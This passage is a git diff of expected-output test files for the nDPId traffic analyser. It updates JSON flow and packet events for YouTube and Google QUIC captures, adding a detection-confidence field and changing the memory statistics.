AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363824401,"flow_last_seen":1489363824401,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1489363824401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363824401,"flow_last_seen":1489363824401,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1489363824401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}}
 02261{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1489363824401,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1489363824401,"pkt":"gCqojWksxCwDBkn+CABFAAViiX4AAEARAADAqAEH2DrNQtJjAbsFTmyMDXhX73QJ\/9nIUTAzNQL3N20WC4prgrlnEEXpdg0UiWbXJhn9rrqPsD7nypSAi6kAnw8WQDgk9WvHBUMq3ztLT3UfD0gz+me7oBLVs9bjXCdM3vfRP04sqX92qJrBMWJiq3+eKjCNhyA3dhTNbGSGyKI7\/jcHFMipWf2f2NsuOihlYKhTPSCEE\/3dxQ5VpSOD4BfoNhUiG4SLXDgBvtHLX5RXQiz6BGmJPkfw0Dv35AvtRBL6UAIgkl\/K+oTxY08q1VHTawdG6K3aOXtZN79Qa45uh7pT1oVWMplxpgw8JT2Arpn6WXMTVuz7IIjcMmVGkmTbz31c16ROCt97FgLzWLKXSjlRTCuInYAnb8OLy7A3ZgiVpjlf24uxYYBETmSsYE22pkbiA3KDPQJQySgTeBTaSmM7bUYZKVC0sqnRUOvf3ZY91A7qJZn\/ba900D1Z+aCkzIM+N0cL4OdjAPHVbjoNNBPob96VT7KYOqrcxvdgiQK4z8YyO7qPdy3wkVPEp8S1cfxO0GcnNc57dkkmdplcftLswiLsyuSbEUEIvemACkZhnlX++EeQWxNqo5pgetjas2fIO3OoczlGrqEelJ1yoqALFrNOoHHqiCTaPzG9Vq6SC5ccc+y0eJXHfhIMNqRedbbXK4yLYwqtZ9myh7TSQTMNDNtNNcokuMoYRffKy+Hilx9blgPA+kxeACnNv8k+XoHbLejLn53fsVGrfJ27oHLpBxd0gpX8C1SWMyy3mXnpEVSzUrkvObuxIcI1iIIRkXe4ha0xa6JvFSR1XvxPQ5uBs1VZvBiRzdozCrjMOEc9HhPIaepumDcavW6RkKdtpFOTOABhKPB+xTF+tw5twgZvOB6spOi3XFDCLlgZYRUP2AglByKCpQdxHum5b0xn6Bxg+gulV7DAa4F6bq\/phQubcSVFzDkjjddAVTq8Ke7Bcb2PIaw4POMGF8i+3Ejx3gConV0\/n9f+1mrX6y1TPQ+529up7M7aIJBqu\/KbECK4GCmg+69dFQcqMdvDDodT0LicyE6jgNHVr3Xxl9T9WRp\/ZEkID0WaSc8lamVKWuAoEej6VLe9Xsojacxjt0L1ZkVNCdZBeOWPV\/2r27Cc0KxFG00xU+mkL6oc\/P+4mp1vjwqej4OpJO4H7X\/bD1uR+eKFP96VSf8gVXiQ3DmEGxcfGruXncj9yz32x4yvvKzg03pwZiXXTtpaX0N3ObUthGwiiBr3OqJCsJVke4\/DSc35dh+HTeY+td+Oc4jCcwuV2lOoS0dT73DkKXYTbuBravYDZhjPNKQNF+6bWKCm8kZsYuCZUcPzccjiAYkhk0zhBSnaWNqdI6hOWVUghH2pIeRl1S8CHH23kuVsWd8GixiV6+GG7ClvWoVE8MrCJVfuDBih03bB7tpS\/HVKC2E9e6YR1Im8\/dzl\/GrYBeLaQJMx6dvF2cWrBFw9TxwkKIBGesF7P4zSSZnZmPB\/8T0n45nH26wWJrG9slMatMUMQF1ah+pPdZ8x+tlROoO4fF2yjn4px+eRlie\/MHUCbhkcAUhlXdTBiPNIvr7yc+xKglTelzU+igEYMaYRT7qb8rNLbLWFex\/imDEBTq6nYSPvkTgwNxYJA65n\/p6p8VPjqErPaqpEUd07O9wbQiW9G2X\/qbV3yLCPMbA96flDvOZN+LC6\/DnJyMwZn5lo+SBoTbwt518b7bgUS1UA82oVmCGe8vFKQu9\/05aE1OZbqUSUoFxZX0RxFiFxGsclnNnAvgLNexJFieDNVkLIeVZwsdn1VKuKE5NTKqEm\/iO1n+rmnQA3"}
 00861{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1489363824402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":356,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":356,"pkt_l4_len":322,"ts_msec":1489363824402,"pkt":"gCqojWksxCwDBkn+CABFAAFWgV8AAEARAADAqAEH2DrNQtJjAbsBQmiADXhX73QJ\/9nIUTAzNQNN4EYmtc8pzVIIOlw5wUUTViVod6Y0+1HgA3vBxmFBB9XdzPolT4EuSqVTYDWG+BQf0+uutBG1cIb1StnXne22+Sa3VBkmnkxHzdhhHTq5RFHE1DzOC1OWyujit50aD9fovXbwARSedQlPJ7gjdJSVfTm6O3nF2k42pradZvrpU1ech4qBDDCfAnmOfCXqI5NXsD3jyb4bcNfoTf5ko+c96L+Kv0ngIjlmGgFFf6vJ8QwUVroovQmrUV9bPxW9NYlbZzDQO3\/aocbUP2HxCiVbIwPbD2Jd4G+p\/+kRB\/3zN\/cBW\/zgsZhwNASU8TEuM0gATTjCn+DvX6KA+8RurPRChvD1WnZ\/ZRI9q2M84tMzgiUjvDAoLSC7i0dr41HUDnzmJH+mr0XOTEoxFNo="}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1489363823738,"flow_last_seen":1489363826862,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":167659,"flow_avg_l4_payload_len":649,"midstream":0,"ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1489363823466,"flow_last_seen":1489363824024,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3933,"flow_avg_l4_payload_len":302,"midstream":0,"ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1489363824401,"flow_last_seen":1489363824840,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":439,"midstream":0,"ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1489363823738,"flow_last_seen":1489363826862,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":167659,"flow_avg_l4_payload_len":649,"midstream":0,"ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1489363823466,"flow_last_seen":1489363824024,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3933,"flow_avg_l4_payload_len":302,"midstream":0,"ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1489363824401,"flow_last_seen":1489363824840,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":439,"midstream":0,"ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}}
 00162{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","total-events-serialized":20}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 289/289
@@ -26,9 +26,9 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4605754 bytes
-~~ total memory freed........: 4605754 bytes
-~~ total allocations/frees...: 99851/99851
+~~ total memory allocated....: 4690051 bytes
+~~ total memory freed........: 4690051 bytes
+~~ total allocations/frees...: 101441/101441
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 167 chars
 ~~ json string max len.......: 2266 chars
diff --git a/test/results/youtubeupload.pcap.out b/test/results/youtubeupload.pcap.out
index 3c82670ba..632b732bb 100644
--- a/test/results/youtubeupload.pcap.out
+++ b/test/results/youtubeupload.pcap.out
@@ -1,24 +1,24 @@
 00445{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"youtubeupload.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576794,"flow_last_seen":1511102576794,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1511102576794,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02239{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1511102576794,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1511102576794,"pkt":"XEl5dU5q2MuK4S0uCABFAAViAT5AAIARbUHAqAIbrNkXb8rVAbsFThECDZHSvk7nMdgaUTAzOQFHnN3hyT1jd4lP+l6gAQUUQ0hMTxMAAABQQUQAywMAAFNOSQDdAwAAVkVSAOEDAABDQ1MA8QMAAE1TUEP1AwAAVUFJRCQEAABUQ0lEKAQAAFBETUQsBAAAU01ITDAEAABJQ1NMNAQAAENUSU08BAAATk9OUFwEAABNSURTYAQAAFNDTFNkBAAAQ1NDVGQEAABDT1BUaAQAAElSVFRsBAAAQ0ZDV3AEAABTRkNXdAQAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tdXBsb2FkLnlvdXR1YmUuY29tUTAzOQHogWCSkhrofu2AhqIVgpFkAAAAQ2hyb21lLzYyLjAuMzIwMi45NCBXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQAAAAAWDUwOQEAAAAeAAAAc5gRWgAAAABmJfKEu+Ky\/D790R+7T+2\/0X2\/pJXF+QSwhgBhJRTmB2QAAAABAAAANVJUT5jAAAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576794,"flow_last_seen":1511102576794,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1511102576794,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576794,"flow_last_seen":1511102576794,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1511102576794,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576835,"flow_last_seen":1511102576835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1511102576835,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1511102576835,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1511102576835,"pkt":"XEl5dU5q2MuK4S0uCABFAAA0AURAAIAGcnTAqAIbrNkXb+BsAbtWAw9KAAAAAIAC+vClngAAAgQFtAEDAwgBAQQC"}
 02251{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1511102576850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1511102576850,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADkRtX+s2RdvwKgCGwG7ytUFTpL9CJHSvk7nMdgaAY7UOy2eqBjwqYbdQEABH3gBAQD\/\/\/\/6BgCAAVJFSgAIAAAAU1RLADgAAABTTk8AbAAAAFBST0a0AAAAU0NGR1MBAABSUkVKVwEAAFNUVExfAQAAQ1NDVFECAABDUlT\/XwkAAEbxGDSLTF1Q0EvnndIQSTAo6qDgodwKRUkl\/wgXSXZEn9QM2BlHJ5TGchczmqfpPPkVE8tMlsFMfVeayelDb2fy4YzLDv2N+n2kP+GPU+AvJ+LZZRk0N6KyGXGuCIybXc0DgBajeTEN+eTXljBGAiEAu2XBBVnB4JB\/pAM2aIMKtRsM68whkJeFp\/sUQ4KWuigCIQClJ1nIthgBruSaqgIGHfDqWyoEY6pcU10gsmGqIhMu0lNDRkcIAAAAQUVBRAgAAABTQ0lEGAAAAFBETUQcAAAAVEJLUCAAAABQVUJTQwAAAEtFWFNHAAAAT0JJVE8AAABFWFBZVwAAAEFFU0dDQzIw9lqyAICUa+kwugeWBsbKvkNISURUQjEwIAAAhphHmLi5BO0Bd0EZ92vmXccblzalgzbYj90Qfoq9ozBDMjU1MDAwMDAwMDBAFRRaAAAAAAwAAADPfAIAAAAAAADwAHUApLkJkLQYWBSHuxOizGdwCjw1mAT5G9+443fNDsgN3BAAAAFfeBYhgQAABAMARjBEAiBdvW4RdrxYmmjeJbc+3jgs5l6RJLipl3aPIQhj9TtUVgIgA9hjkGDtPgI+WyeFtwtRP0uw9dCVeIWw5SDGQbdmUYsAdwDd6x0reg1PpiCLga2BaHB+Lo6dAdVciI09EcTNtuy+zAAAAV94FiCrAAAEAwBIMEYCIQCUIhZCh2zhmqj0uNpoeUCnAI4TO75j9mv1oMYRKX9EbwIhAIVqH7drJ4DDuKcAhaeeCXOoj8EoQkKnHGLbzkyKPDlhAQEDAeiBYJKSGugAAAAAALsLAAB4u4FGwB+tWGtQE1cUJpBXY6I8VdDyFNEgYZOQAr7wiYpWBawlaIsJ2cBCSCJJwEgVWK3A4KNOsVAVxfdjqlClUhXRURAFClYRHasEpKBgRdBILVjtzS6ETSYz9oczmdmc777Onnvu9527WTQrwFy0TRBKTcQLKrp9dm9xz+ylJ4l0NALQ0SJTNhpMGAZIGIUiTgYb8pXrDXnhuTHeCAI35bB6mBzcF\/AwMggEG8\/l8gN4AQK8oOLyArh8PlZQSS0uRWcy5oK8kSqS5YhoKCFpTNbnCo1cbciulQicavSLSfTLCXLA\/GIy2SCmBhjbXCGAaeAd62cA1adjf2xINJs5VuSOLXMcnO6g0xtjxu1zfIrK71z\/\/lBHSmjev8J8r4IzjW36x8zZNOc0+uStj3j5jQFTCvdXObyJDvLf4usWsNFD234IpYyDUMoYbF1AYEyIMUxgprRFy4BQm1YDYkdGbe4DoxE1cRNlsTkiuSRZgUgwczQwlUpYHofIYWI3ezYnVqbQSIiYI5sjEQfx+cECvhGWo1QwPWhGR4JnLMjJFDVvaGa8k59ILpJp1UisCsNHDLsjIhoybIah1TiI3NROUJramkR0FPHFOKJkc0BjBojNewCvTYGkdWaA2nxIipzgswQmGLCKYEiTCUa8hmAgaoIhlxEMpYmhNmwBbogkgDbw4BmdwRG5YU9wALQmwaAKwbrZDaEpiARWYJAhC1RqQKaxhmEsggUaGWzDvnEJ\/3lDO54Eq5NBL2JvMBWod+IRjNRQW4MlI+YJ2HmtQqPWiGE\/uSJWoUhEjKk3iJt1gyUaXPYxnAZwNUeMxRakTVIchroY"}
 02267{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1511102576851,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1511102576851,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADkRtX+s2RdvwKgCGwG7ytUFTrHlCJHSvk7nMdgaAjk3HVeItBZp3u\/MM6QBBSEEhrNWhsBytYq44AhiRo+TwCmwTKGEk42JPpys442NKgutZCyRqQAAtRXqaDF9GcRDYiH0Y\/Fi0MLsDELQGJhY4OvQsShgL0wMj6PF4FCw0EDxBIlYDUjOl0D+boN8rExECEHyX7Bo9gIexu6+BD0Z6jwYVS5xhEFjCAVnb9OEZ+1zI6xu60jhXe7FYiEjXGJWdBF1I+wRdfS48r74X1JeZ567KHa5EJ3pD3ngVQyQUTCSgZUFTVprCgmiU6lxmUwgGRCEl12TIR\/Iu8iryOND7yMz0xaswN6jCztbGOmK9M1HAtnb0p6qNH6hov6O7rqWzJfC2lmeHtZeU6WbjsS8u3ntcJQzOr2oWOwTXcLWes24V6eOPFWo8+TNul2fEFLQ78eM1PXs2XQnqjfDqk3auk2v6+r9pEcxm7ylpmzrihbHoOb9i7fucvoKaS0tCfOsbMqMP3nB9ezFL69FLLtTF+p+dsZl1fPc\/DBpqVvY0e9eHrAZ+VA9+k3JGb\/9upojFbdLGEEHzpW4tGy79WmG8IZ+5InTV7teNKN9mWsYUcLOpqcV59uW1kr1OramoTHz1vv11JzRr2tDd4S\/WkfbF2P7ZGza6rI\/j9Us8WXle5QG\/b6jzfNgyphjqo6oKWSDFJMnAQGwxaXYlmTl4Z1d0i88lvqCkib10ZlL8sf48IBpMSTg8YAY8\/iBmBZzeXzwEwQLgqM\/pux\/6Oa0l01OXX1\/+c6p1ENoy\/3lC8tzQnqdlS7ZoRtbdlT15tR7dEe\/E7HKePNyitQjIpd9cbgeFe\/qfiaMud5KybCv\/DovpHzVwiB95N8TOgZ2djpVNugjWfqwt\/tXNG+oKEpUZF25tdxtEmQz6wFdFS5Lfz91+rFA6vZLi+3IzzZMaO745y137UDe3TWvOGHFc27XdlUmuJypi3zktDjX7YazyO23wuMzY303CxB48w3nqlDPN5G7Ktoywmyvs\/+6kO9uVx38oy25qEe0fpf31qURmsfnntNrHN\/WeyacXdoQapOfb7Pxys\/NacXz+Q0XZq4ta9Z7e19lCXIKCwdG2mlzXAOrircnI\/g3DpRkByLCMjmYFj9jDB9zi+fW\/KMGh8A\/npA75EqgFPvB8xrHUWmTYjFShuyNNEGHqOBhDa5jAvygcyBwwyoCN6wtE0wGiocL7zg1ftXFTvv\/oJAPXPQs8EXNovaf7kkkqasq1vY36F29qncjsStini1pcp7kJZFuH1+dlSGJIedOLC7QMZTl5c4zutP4J9Iv6SmNyouUidqu3dUF52nOcEDd9M6QKlK\/grnxj\/XK1Uve+Vn11FT4bS89njFAcsiu3RvSfjG1ZmrcZ6\/q7\/pYJ88tuiS37l1AWTuTJOy02+fyavOojKMH1wn8z1UfTB\/zTWvuytPdcdnhPtCaI+KIa4F3p3V9yyYFZR1sUJ46vP5m5ZOaqgflXryX78ZeTWvRTfNvvGXb8cOSgXllHhLWeas8yH5iVlRBMCVoVB26EFSw0u7LpTGV75XHW9Nztb6\/wrxD58u4nYzXfW68h\/8B+TYP2QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1511102576862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1511102576862,"pkt":"2MuK4S0uXEl5dU5qCABFAAA0ZyEAADkGk5es2RdvwKgCGwG74GxxouM+VgMPS4ASpxyk0AAAAgQFZAEBBAIBAwMI"}
